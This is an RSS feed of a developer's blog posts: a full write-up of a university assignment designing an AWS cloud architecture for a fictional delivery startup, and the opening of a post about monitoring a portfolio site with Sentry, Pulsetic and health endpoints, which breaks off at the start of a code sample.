<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Luis Faria</title>
    <description>The latest articles on Forem by Luis Faria (@lfariaus).</description>
    <link>https://forem.com/lfariaus</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3112496%2F1df31403-86f8-4b4e-831c-919231892445.jpeg</url>
      <title>Forem: Luis Faria</title>
      <link>https://forem.com/lfariaus</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/lfariaus"/>
    <language>en</language>
    <item>
      <title>Designing a Cloud Architecture from Scratch: My CCF501 Assessment 1</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Mon, 16 Mar 2026 00:38:15 +0000</pubDate>
      <link>https://forem.com/lfariaus/designing-a-cloud-architecture-from-scratch-my-ccf501-assessment-1-4c25</link>
      <guid>https://forem.com/lfariaus/designing-a-cloud-architecture-from-scratch-my-ccf501-assessment-1-4c25</guid>
      <description>&lt;p&gt;&lt;strong&gt;AWS gives you 200+ services. My Masters assignment asked me to pick the right ones - and justify every decision.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Challenge
&lt;/h2&gt;

&lt;p&gt;This term I'm studying &lt;strong&gt;Cloud Computing Fundamentals (CCF501)&lt;/strong&gt; at Torrens University Australia. Assessment 1 was a design challenge: propose a secure, scalable cloud architecture for &lt;strong&gt;ABC Enterprises&lt;/strong&gt; - a fictional delivery and payments startup modernising its entire IT infrastructure.&lt;/p&gt;

&lt;p&gt;The case study numbers set the stakes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;~80% reduction&lt;/strong&gt; in start-up IT costs after moving to cloud&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;10x customer surge&lt;/strong&gt; absorbed in a single month, with no additional headcount&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No recipe given. Just requirements, a blank canvas, and a word count.&lt;/p&gt;

&lt;p&gt;This article is the full breakdown behind the LinkedIn post I shared - the reasoning, the trade-offs, and what the exercise actually taught me.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Cloud? (And Why Not On-Premises)
&lt;/h2&gt;

&lt;p&gt;Traditional IT means owning servers, cooling, and the staff to keep it all running. For a high-growth startup like ABC, that model is a strategic liability. You buy capacity for a projected peak, sit on idle hardware during troughs, and wait weeks for procurement when demand surges beyond forecast.&lt;/p&gt;

&lt;p&gt;Cloud flips the model: rent capability, not hardware. The NIST definition nails it with five characteristics:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;NIST Characteristic&lt;/th&gt;
&lt;th&gt;What It Means for ABC&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;On-Demand Self-Service&lt;/td&gt;
&lt;td&gt;Dev team spins up EC2 and RDS via console - no vendor call required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Broad Network Access&lt;/td&gt;
&lt;td&gt;App accessible via mobile and browser across delivery, taxi, and payments verticals&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Resource Pooling&lt;/td&gt;
&lt;td&gt;ABC shares AWS physical hardware; workloads logically isolated per tenant via VPC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rapid Elasticity&lt;/td&gt;
&lt;td&gt;10x surge absorbed automatically - no procurement delay, no manual intervention&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Measured Service&lt;/td&gt;
&lt;td&gt;~80% reduction in start-up IT costs - pay only for compute-hours and GB-months consumed&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Three Benefits That Mattered for ABC
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Cost Efficiency: CAPEX to OPEX
&lt;/h3&gt;

&lt;p&gt;Cloud shifts spend from capital expenditure (hardware you buy) to operational expenditure (capacity you consume). The ~80% reduction in start-up IT costs is the measured service characteristic in action. As workloads grow, standard operations - backups, patching, scaling - get codified and automated, reducing human toil across the pipeline.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Rapid Scalability Without Procurement
&lt;/h3&gt;

&lt;p&gt;A 10x customer surge in a single month exposes the core weakness of on-premises: procurement lead times mean hardware arrives after the opportunity has passed. EC2 Auto Scaling provisions or terminates instances based on CloudWatch signals - capacity becomes policy-driven, not operator-driven.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Reduced IT Management Overhead
&lt;/h3&gt;

&lt;p&gt;In on-premises environments, more customers means more infrastructure and more staff to maintain it. Cloud breaks that linear relationship. Through resource pooling, providers consolidate physical resources across tenants, letting ABC gain resilient architectures that would be expensive to replicate in-house.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Architecture
&lt;/h2&gt;

&lt;p&gt;I chose AWS - partly because Route 53 was already in the described stack, and partly because the managed-service breadth made every design decision straightforward to defend.&lt;/p&gt;

&lt;p&gt;Here's how the stack layers together:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Route 53&lt;/strong&gt;: DNS layer, the front door. Handles routing and health checks at the DNS level.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Elastic Load Balancer (ELB)&lt;/strong&gt;: distributes inbound traffic across EC2 instances, runs health checks before requests hit compute, integrates natively with Auto Scaling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EC2 + Auto Scaling&lt;/strong&gt;: horizontally scalable compute. Provisions or terminates instances on demand signals. Absorbed the 10x surge with zero manual intervention.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;S3&lt;/strong&gt;: object storage for assets, backups, and static content. Pay-per-GB, no provisioned minimum, practically unlimited ceiling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RDS&lt;/strong&gt;: managed relational database (PostgreSQL). Removes operational overhead of running your own DB server. Multi-AZ for resilience, read replicas on demand.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Lambda&lt;/strong&gt;: event-driven compute for workflow automation: order placed → delivery assigned; payment confirmed → restaurant notified. Scales to zero when idle, charges only per invocation.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The traffic flow looks like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnd84jg52794hrrt9eqdk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnd84jg52794hrrt9eqdk.png" alt="ABC Enterprise cloud traffic flow" width="800" height="322"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And the high-level architecture:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F64iqa3orf6wuuu0ltnzt.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F64iqa3orf6wuuu0ltnzt.png" alt="AWS High-Level Architecture Diagram for ABC Enterprises" width="800" height="413"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Three Challenges (and How to Mitigate Them)
&lt;/h2&gt;

&lt;p&gt;Cloud adoption is not risk-free. Three challenges are most relevant for ABC:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Security and Privacy
&lt;/h3&gt;

&lt;p&gt;ABC handles payments and customer PII. Security is the top concern for cloud adopters - 90% of security professionals cite it as a challenge. Mitigation isn't a single switch; it's a cascade:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;IAM least-privilege policies - nothing gets more access than it needs&lt;/li&gt;
&lt;li&gt;Mandatory MFA on all console and API access&lt;/li&gt;
&lt;li&gt;Encryption at rest and in transit across S3, RDS, and Lambda&lt;/li&gt;
&lt;li&gt;Security groups on EC2 as a network firewall layer&lt;/li&gt;
&lt;li&gt;AWS WAF + Shield Standard at the perimeter&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The shared responsibility model is the mental model here: AWS secures the infrastructure, ABC secures what runs on it.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Cost Volatility
&lt;/h3&gt;

&lt;p&gt;Pay-as-you-go can spiral without guardrails - overprovisioned instances and excessive egress generate surprise bills. Mitigation: FinOps habits from day one. Budget alerts, resource tagging, rightsizing, and reserved pricing for stable workloads.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Vendor Lock-in and Skills Gap
&lt;/h3&gt;

&lt;p&gt;Deeper managed-service adoption makes provider migration expensive. Mitigation: prioritize portability (containers, standard databases) and invest in targeted upskilling. The skills gap is a real cost that rarely appears in TCO calculations.&lt;/p&gt;




&lt;h2&gt;
  
  
  Deployment and Service Model
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why Public Cloud
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deployment Model&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;th&gt;Elasticity&lt;/th&gt;
&lt;th&gt;ABC Fit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Public Cloud&lt;/td&gt;
&lt;td&gt;Low - OPEX only&lt;/td&gt;
&lt;td&gt;High - Auto Scaling&lt;/td&gt;
&lt;td&gt;✅ Recommended&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Private Cloud&lt;/td&gt;
&lt;td&gt;High - CAPEX + ops staff&lt;/td&gt;
&lt;td&gt;Limited - fixed capacity&lt;/td&gt;
&lt;td&gt;❌ Over-engineered for a startup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hybrid Cloud&lt;/td&gt;
&lt;td&gt;Medium - dual infrastructure&lt;/td&gt;
&lt;td&gt;Moderate - complex to manage&lt;/td&gt;
&lt;td&gt;⚠️ Premature for current maturity&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Public cloud is the clear fit. IBM reports IaaS workloads experience 60% fewer security incidents than traditional data centres - so "private = more secure" is a myth worth dispelling.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why IaaS + PaaS (Not SaaS)
&lt;/h3&gt;

&lt;p&gt;Cloud service models sit on a control-versus-responsibility spectrum. IaaS gives compute flexibility. PaaS abstracts infrastructure so the team can focus on development. SaaS offers limited customisation - less suited to a startup that must differentiate its platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Recommendation:&lt;/strong&gt; Blend IaaS (EC2 for compute flexibility) with PaaS (RDS and Lambda as managed services). Add a VPC for network isolation as the platform matures.&lt;/p&gt;




&lt;h2&gt;
  
  
  Cost Model
&lt;/h2&gt;

&lt;p&gt;Three levers exist:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pay-as-you-go&lt;/strong&gt;: maximum flexibility, highest unit price&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reserved/committed pricing&lt;/strong&gt;: discounts of 30–60% for baseline commitments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Spot/preemptible&lt;/strong&gt;: deep discounts for interruption-tolerant workloads&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Recommendation:&lt;/strong&gt; A hybrid cost model - reserved capacity for stable customer-facing tiers (web/app, databases), pay-as-you-go autoscaling for demand spikes, and spot instances for background jobs and analytics pipelines.&lt;/p&gt;

&lt;p&gt;Cloud adoption is rarely about the cheapest bill. It's about better ROI: less downtime, faster launches, and automation that avoids linear headcount growth.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why AWS Over Azure or GCP
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Provider&lt;/th&gt;
&lt;th&gt;Ecosystem Fit&lt;/th&gt;
&lt;th&gt;Load Balancing&lt;/th&gt;
&lt;th&gt;Serverless&lt;/th&gt;
&lt;th&gt;ABC Alignment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;Broadest managed-service catalogue&lt;/td&gt;
&lt;td&gt;ELB - native Route 53 integration&lt;/td&gt;
&lt;td&gt;Lambda - event-driven, zero idle cost&lt;/td&gt;
&lt;td&gt;✅ Best fit - Route 53 already in stack&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;Microsoft / enterprise-aligned&lt;/td&gt;
&lt;td&gt;Application Gateway - extra config&lt;/td&gt;
&lt;td&gt;Azure Functions - separate ecosystem&lt;/td&gt;
&lt;td&gt;⚠️ No Microsoft signals in ABC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;td&gt;Analytics and ML-first&lt;/td&gt;
&lt;td&gt;Cloud Load Balancing - GKE-oriented&lt;/td&gt;
&lt;td&gt;Cloud Run / Functions - container-first&lt;/td&gt;
&lt;td&gt;❌ No analytics-heavy workloads yet&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The Route 53 signal was decisive. It's not just familiarity - it means the DNS and load balancing layers integrate natively, reducing configuration surface area and failure points.&lt;/p&gt;




&lt;h2&gt;
  
  
  What the Exercise Actually Taught Me
&lt;/h2&gt;

&lt;p&gt;The biggest insight wasn't choosing between AWS services. It was understanding &lt;em&gt;why&lt;/em&gt; you layer them the way you do.&lt;/p&gt;

&lt;p&gt;Security is not a layer you add at the end. It lives at every tier:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;DNS filtering at Route 53&lt;/li&gt;
&lt;li&gt;Traffic rules at the load balancer&lt;/li&gt;
&lt;li&gt;Security groups on EC2&lt;/li&gt;
&lt;li&gt;IAM policies on S3 and Lambda&lt;/li&gt;
&lt;li&gt;Encryption at the data layer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Similarly, scalability isn't one Auto Scaling policy. It's a cascade: DNS health checks → load balancer distribution → compute elasticity → database read replicas. Each layer has to be designed to hand off load gracefully to the next.&lt;/p&gt;

&lt;p&gt;The other thing I'll carry forward: &lt;strong&gt;reserved instances vs on-demand pricing is an architectural decision, not just a finance conversation.&lt;/strong&gt; What you commit to reserved shapes what you build around it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Full Services Provisioned
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;AWS Service&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Baseline Config&lt;/th&gt;
&lt;th&gt;Scale Ceiling&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;EC2 (web/app tier)&lt;/td&gt;
&lt;td&gt;Serve API requests&lt;/td&gt;
&lt;td&gt;2× t3.medium&lt;/td&gt;
&lt;td&gt;20× c5.xlarge&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auto Scaling&lt;/td&gt;
&lt;td&gt;Scale EC2 fleet on demand&lt;/td&gt;
&lt;td&gt;Policy-driven (CloudWatch)&lt;/td&gt;
&lt;td&gt;Absorbed 10x surge, zero manual intervention&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ELB&lt;/td&gt;
&lt;td&gt;Distribute inbound traffic&lt;/td&gt;
&lt;td&gt;Always-on&lt;/td&gt;
&lt;td&gt;Scales transparently&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RDS (PostgreSQL)&lt;/td&gt;
&lt;td&gt;Structured data: orders, rides, payments&lt;/td&gt;
&lt;td&gt;db.r5.large, Multi-AZ&lt;/td&gt;
&lt;td&gt;Read replicas on demand&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;S3&lt;/td&gt;
&lt;td&gt;Receipts, media assets, backups&lt;/td&gt;
&lt;td&gt;Pay-per-GB&lt;/td&gt;
&lt;td&gt;Unlimited&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lambda&lt;/td&gt;
&lt;td&gt;Event-driven workflows&lt;/td&gt;
&lt;td&gt;128 MB / 3s timeout&lt;/td&gt;
&lt;td&gt;1,000 concurrent (raisable)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Route 53&lt;/td&gt;
&lt;td&gt;DNS routing and health checks&lt;/td&gt;
&lt;td&gt;Always-on, per-query billing&lt;/td&gt;
&lt;td&gt;Globally redundant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;VPC&lt;/td&gt;
&lt;td&gt;Network isolation&lt;/td&gt;
&lt;td&gt;Single VPC, subnet per tier&lt;/td&gt;
&lt;td&gt;Peering + private endpoints as needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CloudFront&lt;/td&gt;
&lt;td&gt;CDN - static asset delivery&lt;/td&gt;
&lt;td&gt;Global edge&lt;/td&gt;
&lt;td&gt;Scales to any volume&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CloudWatch&lt;/td&gt;
&lt;td&gt;Monitoring and autoscale triggers&lt;/td&gt;
&lt;td&gt;Always-on&lt;/td&gt;
&lt;td&gt;15 months metric retention&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AWS WAF + Shield&lt;/td&gt;
&lt;td&gt;DDoS mitigation, traffic filtering&lt;/td&gt;
&lt;td&gt;Shield Standard (free)&lt;/td&gt;
&lt;td&gt;Shield Advanced available&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Building in Public
&lt;/h2&gt;

&lt;p&gt;Studying for a Masters while working full-time means assignments like this don't stay abstract. The same patterns - load balancing, autoscaling, IAM, cost modelling - appear in the systems I work with every week.&lt;/p&gt;

&lt;p&gt;I'm sharing the architecture diagrams, the reasoning, and the assessments publicly because the learning compounds when it's in the open.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;📋 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2026-T1/CCF/assignments/Assessment1/CCF501_Assessment1.pdf" rel="noopener noreferrer"&gt;Assessment Brief - CCF501 Assessment 1&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;📄 &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2026-T1/CCF/assignments/Assessment1/drafts/report/vf_CCF501_Faria_L_Assessment_1.pdf" rel="noopener noreferrer"&gt;My Report - Technology Report and Presentation&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🖥️ &lt;a href="https://github.com/lfariabr/masters-swe-ai/blob/master/2026-T1/CCF/assignments/Assessment1/drafts/presentation/vf_CCF501_Faria_L_Assessment_1.pdf" rel="noopener noreferrer"&gt;My Presentation Slides&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you're designing cloud architectures - or just starting to think about them - what pattern challenged your assumptions the most?&lt;/p&gt;




&lt;h2&gt;
  
  
  Let's Connect
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;p&gt;Amazon Web Services. (n.d.-a). &lt;em&gt;AWS Well-Architected Framework&lt;/em&gt;. &lt;a href="https://aws.amazon.com/architecture/well-architected/" rel="noopener noreferrer"&gt;https://aws.amazon.com/architecture/well-architected/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Amazon Web Services. (n.d.-b). &lt;em&gt;AWS Pricing&lt;/em&gt;. &lt;a href="https://aws.amazon.com/pricing/" rel="noopener noreferrer"&gt;https://aws.amazon.com/pricing/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bittok, T. (2022). Cloud total cost of ownership. &lt;em&gt;LinkedIn Pulse&lt;/em&gt;. &lt;a href="https://www.linkedin.com/pulse/cloud-total-cost-ownership-theophilus-bittok-/" rel="noopener noreferrer"&gt;https://www.linkedin.com/pulse/cloud-total-cost-ownership-theophilus-bittok-/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Eliaçık, E. (2022). Pros and cons of cloud computing. &lt;em&gt;Dataconomy&lt;/em&gt;. &lt;a href="https://dataconomy.com/2022/05/pros-and-cons-of-cloud-computing-2022/" rel="noopener noreferrer"&gt;https://dataconomy.com/2022/05/pros-and-cons-of-cloud-computing-2022/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;IBM. (n.d.-b). What is a public cloud? &lt;em&gt;IBM&lt;/em&gt;. &lt;a href="https://www.ibm.com/think/topics/public-cloud" rel="noopener noreferrer"&gt;https://www.ibm.com/think/topics/public-cloud&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;McHaney, R. (2021). &lt;em&gt;Cloud technologies: An overview of cloud computing technologies for managers&lt;/em&gt;. Wiley.&lt;/p&gt;

&lt;p&gt;Mell, P., &amp;amp; Grance, T. (2011). &lt;em&gt;The NIST definition of cloud computing&lt;/em&gt; (Special Publication 800-145). NIST. &lt;a href="https://doi.org/10.6028/NIST.SP.800-145" rel="noopener noreferrer"&gt;https://doi.org/10.6028/NIST.SP.800-145&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cloudcomputing</category>
      <category>aws</category>
      <category>architecture</category>
      <category>buildinpublic</category>
    </item>
    <item>
      <title>Production Observability for $0: How I Monitor My Portfolio with Sentry + Pulsetic</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Mon, 02 Mar 2026 04:24:30 +0000</pubDate>
      <link>https://forem.com/lfariaus/production-observability-for-0-how-i-monitor-my-portfolio-with-sentry-pulsetic-3dil</link>
      <guid>https://forem.com/lfariaus/production-observability-for-0-how-i-monitor-my-portfolio-with-sentry-pulsetic-3dil</guid>
      <description>&lt;p&gt;&lt;strong&gt;I got my first Sentry weekly report. 23 errors. 1.7k transactions. On a side project. That's what production observability looks like — and it costs $0.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  The Email That Made It Real
&lt;/h2&gt;

&lt;p&gt;A few weeks after shipping the monitoring stack, the email landed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5gbiz0qm49jl4mhlvjn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5gbiz0qm49jl4mhlvjn.png" alt="Sentry Weekly Email" width="724" height="1568"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I read it twice. Not because something was on fire — but because this is what production engineers actually see (or should) every Monday morning. Error counts. Transaction volume. Trends. I was flying blind before this. Not anymore.&lt;/p&gt;

&lt;p&gt;On this post, I'm sharing details of how I built a 4-layer observability stack on my portfolio (&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;) - open source, free tier, real production data.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem: Shipping Blind
&lt;/h2&gt;

&lt;p&gt;My previous dev.to article (&lt;a href="https://dev.to/lfariaus/from-git-pull-to-gitops-how-i-built-a-production-cicd-pipeline-on-a-12-digitalocean-droplet-34gn"&gt;From &lt;code&gt;git pull&lt;/code&gt; to GitOps&lt;/a&gt;) ended with this honest admission in the "Future Roadmap" section:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"Monitoring &amp;amp; Alerting: Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Once the CI/CD pipeline was working — tests passing, Docker images building, Discord pings on deploy — I had a new problem. I had no idea what was happening &lt;em&gt;after&lt;/em&gt; the deploy.&lt;/p&gt;

&lt;p&gt;Was the site up? Were there errors? Were users hitting rate limits? Was the server about to OOM?&lt;/p&gt;

&lt;p&gt;I didn't know. So I fixed it.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Architecture: 4 Layers
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;                ┌─────────────────────────────────┐
                │   External Uptime Monitor       │
                │   (Pulsetic)                    │
                │   Pings /health/ready every 60s │
                └────────────┬────────────────────┘
                             │ HTTPS
                ┌────────────▼────────────────────┐
                │   Nginx (reverse proxy)         │
                │   Port 80/443                   │
                └────────────┬────────────────────┘
                             │
          ┌──────────────────┼──────────────────┐
          │                  │                  │
┌─────────▼───────┐  ┌──────▼──────────┐  ┌─────▼───────┐
│  Frontend       │  │  Backend API    │  │  MongoDB    │
│  (Next.js)      │  │  (Express)      │  │  + Redis    │
│  @sentry/nextjs │  │  @sentry/node   │  │             │
└────────┬────────┘  └──────┬──────────┘  └─────────────┘
         │                   │
         └─────────┬─────────┘
                   │
          ┌────────▼────────┐
          │   Sentry.io     │
          │   Error Tracking│
          └─────────────────┘

┌─────────────────────────────────┐
│  Cron (every 5 min)             │
│  monitor-resources.sh           │
│  CPU / Memory / Disk / Docker   │
│  → Discord Webhook              │
│  (deduplicated, 30-min cooldown)│
└─────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each layer covers a different failure mode:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;What it catches&lt;/th&gt;
&lt;th&gt;Latency&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Health endpoints&lt;/td&gt;
&lt;td&gt;Is the process running? DB/Redis connected?&lt;/td&gt;
&lt;td&gt;Instant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sentry&lt;/td&gt;
&lt;td&gt;Code errors, crashes, slow transactions&lt;/td&gt;
&lt;td&gt;&amp;lt; 1 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pulsetic&lt;/td&gt;
&lt;td&gt;External view — is the site reachable?&lt;/td&gt;
&lt;td&gt;&amp;lt; 2 min&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cron script&lt;/td&gt;
&lt;td&gt;CPU/Mem/Disk/Docker going wrong&lt;/td&gt;
&lt;td&gt;&amp;lt; 5 min&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Layer 1: Tiered Health Endpoints
&lt;/h2&gt;

&lt;p&gt;Before wiring up external monitors, I needed something for them to ping. I built three tiers — each with a different audience and a different level of detail.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// backend/src/routes/health.ts&lt;/span&gt;

&lt;span class="c1"&gt;// Liveness probe — "is the process running?"&lt;/span&gt;
&lt;span class="c1"&gt;// Always 200. Load balancers use this.&lt;/span&gt;
